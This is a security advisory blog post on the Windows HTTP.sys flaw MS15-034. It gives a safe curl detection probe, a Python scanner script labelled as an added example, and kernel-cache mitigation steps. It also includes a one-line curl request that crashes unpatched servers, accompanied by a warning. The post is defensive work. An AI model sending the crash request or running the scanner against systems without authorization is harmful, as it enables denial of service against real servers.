https://www.sikich.com

MS15-034 Critical Windows Vulnerability: What You Need to Know Now

On April 14, 2015, Microsoft released a critical security update, MS15-034 (CVE-2015-1635), for the Windows HTTP protocol stack (HTTP.sys), the kernel-mode driver that IIS and other Windows web services rely on to handle HTTP requests. While it doesn’t have a catchy nickname (it’s just called the MS15-034 Critical Windows Vulnerability) or a slick logo, there has been good discussion around it, and it is a serious vulnerability: it affects millions of Internet-facing web servers running Windows 7, Windows 8, Windows 8.1, Windows Server 2008 R2, Windows Server 2012 and Windows Server 2012 R2.

Attackers are racing to reverse engineer the patch in the hope of turning the flaw into remote code execution and taking over vulnerable systems. Already, a single specially crafted HTTP request is enough to crash an unpatched Windows web server, and because HTTP.sys runs in the kernel the crash takes down the whole host, not just the web service.

The patch supplied by Microsoft should be applied immediately. The vulnerability lives in HTTP.sys, and the crash is triggered when the IIS kernel caching feature is enabled, which it is by default. Where the patch cannot be applied right away, kernel caching can be disabled as an interim workaround. That does not remove the flaw from HTTP.sys; treat it as a stopgap until the update is installed.

Detecting the Vulnerability

The vulnerability can be fingerprinted by sending a Range header whose upper bound is 18446744073709551615 (2^64 - 1, the largest unsigned 64-bit integer). With the range starting at byte 0, an unpatched install does not serve the content but responds with an HTTP 416 Requested Range Not Satisfiable error; that 416 is the indicator to look for. This probe does not crash the server.

#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"

---snip---

< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Mon, 03 Feb 2014 22:08:50 GMT
< Accept-Ranges: bytes
< ETag: "3fa4eb842c21cf1:0"
< Server: Microsoft-IIS/7.5
< Date: Thu, 16 Apr 2015 02:10:24 GMT
< Content-Length: 362
< Content-Range: bytes */151

Changing the lower bound to a non-zero offset such as 100, against a valid static file, does not produce an error but crashes the host with a bluescreen. Do not send this variant to anything you are not authorized to take down; it reboots the entire server, not just IIS.

#curl -v http://vulnerable.example.com/image.jpg -H "Range: bytes=100-18446744073709551615"

A patched install rejects the same probe with an HTTP 400 Bad Request error. Note that the Server header changes from Microsoft-IIS to Microsoft-HTTPAPI/2.0: the request is refused by HTTP.sys itself before it ever reaches IIS.

#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"

---snip---

< HTTP/1.1 400 Bad Request
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Thu, 16 Apr 2015 00:53:17 GMT
< Connection: close
< Content-Length: 339

Note: These requests were tested against an unpatched Windows Server 2008 R2 system running the default IIS installation.
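The curl checks above are easy to run by hand against one host. The following script is an added example, not code from the original post, that does the same fingerprinting in a way that can be pointed at a list of servers: it sends only the safe probe (range starting at byte 0, never the crashing non-zero offset), parses the status line and headers, and turns the 416 / 400 distinction into a verdict. The sample responses embedded at the bottom are constructed from the curl output shown above so the classifier can be exercised offline; the hostname vulnerable.example.com is the placeholder used in the post.

```python
"""Safe fingerprint check for MS15-034 (CVE-2015-1635) in HTTP.sys.

Added example, not part of the original post. Only the non-crashing probe
(range starting at byte 0) is ever sent; the bluescreen variant is omitted.
"""
import socket
import ssl
from typing import Dict, Tuple
from urllib.parse import urlsplit

# 2**64 - 1: the oversized upper bound used by the public check.
UPPER_BOUND = 18446744073709551615
PROBE_RANGE = f"bytes=0-{UPPER_BOUND}"


def build_probe(host: str, path: str = "/") -> bytes:
    """Raw HTTP/1.1 request carrying the oversized Range header."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {PROBE_RANGE}\r\n"
        "User-Agent: ms15-034-check\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str]]:
    """Return (status code, lower-cased header name -> value) from a raw response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1", "replace")
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def classify(status: int, headers: Dict[str, str]) -> str:
    """Map the probe response to a verdict.

    416 from IIS      -> unpatched HTTP.sys mishandled the 64-bit range
    400 from HTTPAPI  -> patched HTTP.sys rejected the header itself
    200 / 206         -> range served or ignored; the indicator was not
                         reached (non-IIS server, or not a static file)
    A 416 without a Microsoft-IIS Server header may be another server's
    legitimate range handling, so it is only flagged as possible.
    """
    server = headers.get("server", "").lower()
    if status == 416:
        return "vulnerable" if "microsoft-iis" in server else "possibly-vulnerable"
    if status == 400:
        return "patched" if "microsoft-httpapi" in server else "rejected"
    if status in (200, 206):
        return "no-indicator"
    return "unknown"


def probe(url: str, timeout: float = 5.0) -> str:
    """Send the safe probe to a live server and return the verdict."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)
    sock = socket.create_connection((host, port), timeout=timeout)
    if parts.scheme == "https":
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(build_probe(host, parts.path or "/"))
        raw = b""
        while b"\r\n\r\n" not in raw and len(raw) < 65536:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    return classify(*parse_response(raw))


# Constructed sample responses, modelled on the curl output in the post.
VULNERABLE_RESPONSE = (
    b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
    b"Content-Type: text/html\r\n"
    b"Server: Microsoft-IIS/7.5\r\n"
    b"Content-Range: bytes */151\r\n"
    b"Content-Length: 362\r\n\r\n"
)
PATCHED_RESPONSE = (
    b"HTTP/1.1 400 Bad Request\r\n"
    b"Content-Type: text/html; charset=us-ascii\r\n"
    b"Server: Microsoft-HTTPAPI/2.0\r\n"
    b"Connection: close\r\n"
    b"Content-Length: 339\r\n\r\n"
)


def check_samples() -> Dict[str, str]:
    """Run the classifier over the constructed samples without any network."""
    return {
        "vulnerable_sample": classify(*parse_response(VULNERABLE_RESPONSE)),
        "patched_sample": classify(*parse_response(PATCHED_RESPONSE)),
    }


if __name__ == "__main__":
    import sys
    # Usage: python ms15034_check.py http://vulnerable.example.com/
    print(probe(sys.argv[1]) if len(sys.argv) > 1 else check_samples())
```

Point the probe at a static resource (the default site root works, as in the curl output above); a URL handled by an application rather than served from the kernel cache may never hit the vulnerable code path and will come back as "no-indicator" even on an unpatched host.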

Mitigation for MS15-034

If the MS15-034 patch cannot be installed, disabling the kernel caching feature prevents the crash. Expect some loss of static-content performance while it is off, and remember that this is a workaround for the symptom, not a fix for HTTP.sys: install the update as soon as possible and re-enable caching afterwards.

To disable kernel caching:

  1. Open IIS Manager
  2. In Features View, double-click Output Caching
  3. On the Output Caching page, in the Actions pane, click Edit feature settings
  4. In the Edit Output Cache Settings dialog box, deselect Enable kernel cache and then click OK

This dialog sets the enableKernelCache attribute of the system.webServer/caching section in applicationHost.config, so the same change can be scripted across a fleet of servers rather than clicked through on each one.

Have any questions about fixing the MS15-034 Critical Windows Vulnerability? Please reach out to our experts at any time!

This publication contains general information only and Sikich is not, by means of this publication, rendering accounting, business, financial, investment, legal, tax, or any other professional advice or services. This publication is not a substitute for such professional advice or services, nor should you use it as a basis for any decision, action or omission that may affect you or your business. Before making any decision, taking any action or omitting an action that may affect you or your business, you should consult a qualified professional advisor. In addition, this publication may contain certain content generated by an artificial intelligence (AI) language model. You acknowledge that Sikich shall not be responsible for any loss sustained by you or any person who relies on this publication.
